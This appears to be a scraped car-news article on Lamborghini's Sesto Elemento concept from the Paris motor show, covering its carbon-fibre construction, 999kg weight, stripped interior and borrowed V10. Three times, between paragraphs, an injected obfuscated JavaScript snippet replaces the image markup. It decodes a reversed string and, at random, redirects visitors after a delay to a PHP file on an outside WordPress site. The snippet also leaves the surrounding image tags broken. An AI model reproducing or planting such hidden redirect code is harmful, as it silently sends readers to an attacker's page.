After teasing the automotive media for what seemed like an eternity with obscure detail shots and rumours abound that the replacement to Murcielago was to be revealed, Lamborghini finally pulled the covers off its Paris show star – the Sesto Elemento.

In case your Italian only stretches to little more than quattro formaggi, the name means ‘Sixth Element’ – as in, carbon, the sixth element of the periodic table. And boy, does this concept feature plenty of carbon fibre.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/press_release/paris/parismotorshow201057.jpg” alt=”” width=”728″ />

The Sesto Elemento is a showcase for Lamborghini’s abilities to work with carbon-fibre. The lightweight and extremely strong material has featured heavily in past Lambos, but with the need to reduce weight to try and appease the greenies, the mad, bad, Italian arm of Audi AG has been working hard on new ways of using the magic weave.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/press_release/paris/parismotorshow2010381.jpg” alt=”” width=”728″ />

The net result is a car that tips the scales at a very PR-able 999kg. One way in which the kerbweight was kept to an absolute minimum was to massively pare back the interior. You won’t find any namby-pamby stereo system in here, nor anything much bar three buttons – one for the lights, one for reverse and one to start the engine.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/press_release/paris/parismotorshow201091.jpg” alt=”” width=”728″ />

Ah yes, the engine. If anything, this was the area where Lamborghini did the least work as the V10 in the Sesto Elemento is exactly the same lump as found in the latest Gallardo Superleggera. With 562bhp, it’s theoretically capable of propelling the concept to 100kph in just 2.5secs with a 300kph top speed.
